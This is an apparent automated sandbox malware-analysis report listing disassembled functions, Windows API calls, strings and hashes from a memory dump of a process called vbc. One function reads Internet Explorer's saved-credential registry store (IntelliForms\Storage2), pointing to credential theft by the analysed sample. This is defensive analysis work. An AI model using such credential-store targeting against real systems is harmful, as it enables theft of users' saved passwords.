                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$memchrmemset
                                                                                                                                                                        • String ID: UCD$UCD
                                                                                                                                                                        • API String ID: 1581201632-670880344
                                                                                                                                                                        • Opcode ID: 466d59214c80b3bca22488233ffa0f6a545d692d30eb3385f305033defd9c4bb
                                                                                                                                                                        • Instruction ID: 346eebee7d7e8b6f8d140da3993cfc901939ed9edb34b9035315ebb9ce6523fc
                                                                                                                                                                        • Opcode Fuzzy Hash: 466d59214c80b3bca22488233ffa0f6a545d692d30eb3385f305033defd9c4bb
                                                                                                                                                                        • Instruction Fuzzy Hash: 8551D3719001195BEB10EFA8CC95FEEB7B8AF85300F0444ABF955E7281E778E644CB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004085D0 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSystemMetrics.USER32 ref: 004085E9
                                                                                                                                                                        • GetSystemMetrics.USER32 ref: 004085EF
                                                                                                                                                                        • GetDC.USER32(00000000), ref: 004085FC
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040860D
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00408614
                                                                                                                                                                        • ReleaseDC.USER32 ref: 0040861B
                                                                                                                                                                        • GetWindowRect.USER32 ref: 0040862E
                                                                                                                                                                        • GetParent.USER32(?), ref: 00408633
                                                                                                                                                                        • GetWindowRect.USER32 ref: 00408650
                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 004086AF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2163313125-0
                                                                                                                                                                        • Opcode ID: f1fece8f71670097fa47147ff3162736aa5b7fc67ad6ee2a4cdb5b150032ca2b
                                                                                                                                                                        • Instruction ID: 6b5921239ffcae24bde8aad05d59603f054fe97e3a0e5988cf4f66e7c2dd28aa
                                                                                                                                                                        • Opcode Fuzzy Hash: f1fece8f71670097fa47147ff3162736aa5b7fc67ad6ee2a4cdb5b150032ca2b
                                                                                                                                                                        • Instruction Fuzzy Hash: 2E31A475A00609AFDF04CFB8CD85AEEBBB9FB48350F050539E901F3291DA71ED418A94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00402D82 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free$wcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3592753638-3916222277
                                                                                                                                                                        • Opcode ID: 490489ed51bc5752fe94a4990fd5cd344a627c9c2c9d2179b2f34b9e7a32eba5
                                                                                                                                                                        • Instruction ID: 99c2379fcd531e162887146704610c03ee1d54022b9859d6cf2ce1b1ac3fe7c7
                                                                                                                                                                        • Opcode Fuzzy Hash: 490489ed51bc5752fe94a4990fd5cd344a627c9c2c9d2179b2f34b9e7a32eba5
                                                                                                                                                                        • Instruction Fuzzy Hash: 87616630408342DBDB68AF11D64852FB7B1FF84755F90093FF482A22D0D7B88989DB9A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040BB24 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadMenuW.USER32 ref: 0040BB4B
                                                                                                                                                                          • Part of subcall function 0040B974: GetMenuItemCount.USER32 ref: 0040B98A
                                                                                                                                                                          • Part of subcall function 0040B974: memset.MSVCRT ref: 0040B9A9
                                                                                                                                                                          • Part of subcall function 0040B974: GetMenuItemInfoW.USER32 ref: 0040B9E5
                                                                                                                                                                          • Part of subcall function 0040B974: wcschr.MSVCRT ref: 0040B9FD
                                                                                                                                                                        • DestroyMenu.USER32(00000000), ref: 0040BB69
                                                                                                                                                                        • CreateDialogParamW.USER32 ref: 0040BBB7
                                                                                                                                                                        • memset.MSVCRT ref: 0040BBD3
                                                                                                                                                                        • GetWindowTextW.USER32 ref: 0040BBE8
                                                                                                                                                                        • EnumChildWindows.USER32 ref: 0040BC13
                                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 0040BC1A
                                                                                                                                                                          • Part of subcall function 0040B7A3: _snwprintf.MSVCRT ref: 0040B7C8
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Menu$DestroyItemWindowmemset$ChildCountCreateDialogEnumInfoLoadParamTextWindows_snwprintfwcschr
                                                                                                                                                                        • String ID: caption
                                                                                                                                                                        • API String ID: 1928666178-4135340389
                                                                                                                                                                        • Opcode ID: e424083c0ca5028a7f352563cdf0725328d58b63161901b2b272de0412def72f
                                                                                                                                                                        • Instruction ID: e22aff4ff37d874dc9406bb5861836d8cb00257f57c634ff68b223b0e4ee6d7d
                                                                                                                                                                        • Opcode Fuzzy Hash: e424083c0ca5028a7f352563cdf0725328d58b63161901b2b272de0412def72f
                                                                                                                                                                        • Instruction Fuzzy Hash: 6821A172500218ABEF21AF50EC49EAF3B78FF46754F00447AF905A5192DB789990CBDE
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00408AE8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                        • String ID: %s (%s)$TK@
                                                                                                                                                                        • API String ID: 3979103747-3557169880
                                                                                                                                                                        • Opcode ID: f4f66d51605293ffc8b9c0d396a24cc3e89f4468af1d1deabf9f37978fbe6db0
                                                                                                                                                                        • Instruction ID: e896be4b8b4c8dd321127e9193ea498031fb30aa9e34a4c02f498fe4f9df0790
                                                                                                                                                                        • Opcode Fuzzy Hash: f4f66d51605293ffc8b9c0d396a24cc3e89f4468af1d1deabf9f37978fbe6db0
                                                                                                                                                                        • Instruction Fuzzy Hash: 6F2162B2800118ABDF20DF95CC45E8AB7B8FF44318F05846AEA48A7106DB78E618CBD4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00407CF6 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00407E1C,?,00000000,?,0040DEA5,00000000,?,0040FF40,00000000), ref: 00407D1B
                                                                                                                                                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00407E1C,?,00000000,?,0040DEA5), ref: 00407D39
                                                                                                                                                                        • wcslen.MSVCRT ref: 00407D46
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00407D56
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00407E1C,?,00000000,?,0040DEA5,00000000), ref: 00407D60
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00407D70
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                        • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                        • API String ID: 2767993716-572158859
                                                                                                                                                                        • Opcode ID: 92f02a28e67b077d30d243fedb73b8a8cf66204261723a13f34f01c6e1a273b1
                                                                                                                                                                        • Instruction ID: f6f7092b450fef05d0d872bf5e04b1357ca4228fed94eee9f5e7a838667149bb
                                                                                                                                                                        • Opcode Fuzzy Hash: 92f02a28e67b077d30d243fedb73b8a8cf66204261723a13f34f01c6e1a273b1
                                                                                                                                                                        • Instruction Fuzzy Hash: D201F771A041147BFB1527A0EC4AFAF7B6CDF567A1F20003AF506B10D1EA786E00D6AD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040BC8A Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00408250: GetFileAttributesW.KERNELBASE(?,0040BC93,?,0040BD4A,00000000,?,00000000,00000208,?), ref: 00408254
                                                                                                                                                                        • wcscpy.MSVCRT ref: 0040BCA4
                                                                                                                                                                        • wcscpy.MSVCRT ref: 0040BCB4
                                                                                                                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 0040BCC5
                                                                                                                                                                          • Part of subcall function 0040B82A: GetPrivateProfileStringW.KERNEL32 ref: 0040B846
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                        • API String ID: 3176057301-2039793938
                                                                                                                                                                        • Opcode ID: bf7a0a351ce4cc8900ce4d7334675be5d5e82d406c6e89171aabba82c61a61db
                                                                                                                                                                        • Instruction ID: d09d9999bd57a78b58a4055e383115949195630bbf49bad653da3d74dfc2830b
                                                                                                                                                                        • Opcode Fuzzy Hash: bf7a0a351ce4cc8900ce4d7334675be5d5e82d406c6e89171aabba82c61a61db
                                                                                                                                                                        • Instruction Fuzzy Hash: 8AF0C232EC0A5137EB1137221D03F2A2608CF92B57F15847BB904762D3DA7C4A15D2DE
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0042EE6A Relevance: 13.7, APIs: 2, Strings: 7, Instructions: 245COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • cannot ATTACH database within transaction, xrefs: 0042EED9
                                                                                                                                                                        • database is already attached, xrefs: 0042EF94
                                                                                                                                                                        • out of memory, xrefs: 0042F0D8
                                                                                                                                                                        • database %s is already in use, xrefs: 0042EF3B
                                                                                                                                                                        • too many attached databases - max %d, xrefs: 0042EEC3
                                                                                                                                                                        • unable to open database: %s, xrefs: 0042F0C1
                                                                                                                                                                        • attached databases must use the same text encoding as main database, xrefs: 0042EFE2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpymemset
                                                                                                                                                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                        • API String ID: 1297977491-2001300268
                                                                                                                                                                        • Opcode ID: 5b15f45002721a9a60b4fb60247e63f78b1bd55caec31cf620cafc73cca17a46
                                                                                                                                                                        • Instruction ID: af9b9ef2f5a1795804296138b741be62980529f77760b3752da5ffa5b8d2aff6
                                                                                                                                                                        • Opcode Fuzzy Hash: 5b15f45002721a9a60b4fb60247e63f78b1bd55caec31cf620cafc73cca17a46
                                                                                                                                                                        • Instruction Fuzzy Hash: E991E370B00311EFEB10DF66D581BAAB7F0AF44308F94846FE8559B242D778E945CB59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040C33A Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C127
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C135
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C146
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C15D
                                                                                                                                                                          • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C166
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040C37A
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040C396
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040C3BB
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040C3CF
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040C452
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040C45C
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040C494
                                                                                                                                                                          • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
                                                                                                                                                                          • Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
                                                                                                                                                                          • Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419
                                                                                                                                                                          • Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
                                                                                                                                                                          • Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
                                                                                                                                                                          • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                        • String ID: 8"E$d
                                                                                                                                                                        • API String ID: 1140211610-2418960419
                                                                                                                                                                        • Opcode ID: 630083eee7cbf1c10867c7b3dfcb71eb0ae95e41edb8436bedb91c8cd5998a80
                                                                                                                                                                        • Instruction ID: ebdbfbf94f53a3690cf38ac0907b9363cbed6c4ceb444703d02dc3853126dfb0
                                                                                                                                                                        • Opcode Fuzzy Hash: 630083eee7cbf1c10867c7b3dfcb71eb0ae95e41edb8436bedb91c8cd5998a80
                                                                                                                                                                        • Instruction Fuzzy Hash: 3851AE726007049FD724DF29C586B5AB7E4FF48314F10862EE95ADB391DB78E5408B48
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004171A2 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004171FA
                                                                                                                                                                        • Sleep.KERNEL32(00000001), ref: 00417204
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00417216
                                                                                                                                                                        • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004172EE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3015003838-0
                                                                                                                                                                        • Opcode ID: 157ba01f85cfbf502a73a237e895ba3edcb1d901ab41fe78731a80adfc8094fa
                                                                                                                                                                        • Instruction ID: b1728a7637de8f6c0c3372c087848d546b31592ea547c84e90bff2a5ea0aeb9c
                                                                                                                                                                        • Opcode Fuzzy Hash: 157ba01f85cfbf502a73a237e895ba3edcb1d901ab41fe78731a80adfc8094fa
                                                                                                                                                                        • Instruction Fuzzy Hash: 2F41F27550C702AFE7218F20DC01BA7B7F1AB90B14F20496EF59552381DBB9D9C68B1E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00417E39 Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,004536AC,00417555,00000000,?,00000000,00000000), ref: 00417E63
                                                                                                                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 00417E6A
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00417E77
                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00417E8C
                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,004536AC,00417555,00000000,?,00000000,00000000), ref: 00417E95
                                                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000), ref: 00417E9C
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00417EA9
                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00417EBE
                                                                                                                                                                        • free.MSVCRT(00000000), ref: 00417EC7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2802642348-0
                                                                                                                                                                        • Opcode ID: a04d25dda4580931073b8405a409411f2d4958d2b117b70079af6824c241d029
                                                                                                                                                                        • Instruction ID: 47bfd0c0f8263ce6d61c00ded009a165ca5b61f2fc3d609cfbcfb361f1c4a64c
                                                                                                                                                                        • Opcode Fuzzy Hash: a04d25dda4580931073b8405a409411f2d4958d2b117b70079af6824c241d029
                                                                                                                                                                        • Instruction Fuzzy Hash: 1711063D5087149FCA2027706CC86BF36F49B57772B2102AAF953922D1DB2D4CC1956D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004147A8 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                        • API String ID: 3510742995-3273207271
                                                                                                                                                                        • Opcode ID: 40b6ca6cdc405dc99759052cebd1cbc672c98c7a28f502bbdac5d88d0a62fdf2
                                                                                                                                                                        • Instruction ID: 1058aa724a71ea66541b56df80d5a3cdc90ec5801de880f61679d0e38116f1b7
                                                                                                                                                                        • Opcode Fuzzy Hash: 40b6ca6cdc405dc99759052cebd1cbc672c98c7a28f502bbdac5d88d0a62fdf2
                                                                                                                                                                        • Instruction Fuzzy Hash: 2901927AE542A1A5F63031094C86FF74198DBE3B15FB14127FA96252C5E28D49C382AF
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040A56F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00408D9F: free.MSVCRT(?,00409176,00000000,?,00000000), ref: 00408DA2
                                                                                                                                                                          • Part of subcall function 00408D9F: free.MSVCRT(?,?,00409176,00000000,?,00000000), ref: 00408DAA
                                                                                                                                                                          • Part of subcall function 00413E4F: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004145EB,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00413E62
                                                                                                                                                                          • Part of subcall function 00408EE8: free.MSVCRT(?,00000000,?,0040923F,00000000,?,00000000), ref: 00408EF7
                                                                                                                                                                        • memset.MSVCRT ref: 0040A5DF
                                                                                                                                                                        • RegEnumValueW.ADVAPI32 ref: 0040A60D
                                                                                                                                                                        • _wcsupr.MSVCRT ref: 0040A627
                                                                                                                                                                          • Part of subcall function 00408DC5: wcslen.MSVCRT ref: 00408DD7
                                                                                                                                                                          • Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408DFD
                                                                                                                                                                          • Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408E20
                                                                                                                                                                          • Part of subcall function 00408DC5: memcpy.MSVCRT ref: 00408E44
                                                                                                                                                                        • memset.MSVCRT ref: 0040A676
                                                                                                                                                                        • RegEnumValueW.ADVAPI32 ref: 0040A6A1
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040A6AE
                                                                                                                                                                        Strings
                                                                                                                                                                        • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0040A58C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                        • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                                                                                                                                        • API String ID: 4131475296-680441574
                                                                                                                                                                        • Opcode ID: 4844c8675b145070dad572f60e49686fb6ff8cc7004fd1c20b8f23b22dadcfc4
                                                                                                                                                                        • Instruction ID: 4ff845341dcd1a768bfc42e85b7312ef223b671260cd3b9f040e87321517091f
                                                                                                                                                                        • Opcode Fuzzy Hash: 4844c8675b145070dad572f60e49686fb6ff8cc7004fd1c20b8f23b22dadcfc4
                                                                                                                                                                        • Instruction Fuzzy Hash: AB413BB694021DABDB00EF99DC85EEFB7BCAF58304F10417AB504F2191DB789B458BA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040B301 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
                                                                                                                                                                        • wcscpy.MSVCRT ref: 0040B382
                                                                                                                                                                          • Part of subcall function 0040B7F3: memset.MSVCRT ref: 0040B806
                                                                                                                                                                          • Part of subcall function 0040B7F3: _itow.MSVCRT ref: 0040B814
                                                                                                                                                                        • wcslen.MSVCRT ref: 0040B3A0
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
                                                                                                                                                                        • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040B419
                                                                                                                                                                          • Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B299
                                                                                                                                                                          • Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B2B7
                                                                                                                                                                          • Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B2D5
                                                                                                                                                                          • Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B2F3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                        • String ID: strings
                                                                                                                                                                        • API String ID: 3166385802-3030018805
                                                                                                                                                                        • Opcode ID: 170e241d80e006e2339a4df759dc6eda6b269f3829da48b3c0b34544987349c1
                                                                                                                                                                        • Instruction ID: c57a50961ac065af18f7b97b0dfcf96f0970c66ac6ac5239858a4cd79fa145fe
                                                                                                                                                                        • Opcode Fuzzy Hash: 170e241d80e006e2339a4df759dc6eda6b269f3829da48b3c0b34544987349c1
                                                                                                                                                                        • Instruction Fuzzy Hash: 35415975200701BBDB259F14FC9593A3365E784387B20453EE802A73A3DB39EA16DB9C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040BA65 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                        • String ID: sysdatetimepick32
                                                                                                                                                                        • API String ID: 1028950076-4169760276
                                                                                                                                                                        • Opcode ID: 6b1542d4d031f34238e2cbf040c513ead73d2b908e87e6b72274d0d1e69de0e9
                                                                                                                                                                        • Instruction ID: cf2ea30055fd2b250d8a38ac5c403ff02bed82fd0d2b8d5d11e07c443477a94e
                                                                                                                                                                        • Opcode Fuzzy Hash: 6b1542d4d031f34238e2cbf040c513ead73d2b908e87e6b72274d0d1e69de0e9
                                                                                                                                                                        • Instruction Fuzzy Hash: D31177325002197BEB20EB91DC8AEEF777CEF45750F404066F509E1192EB749A41CB99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0041B0F4 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
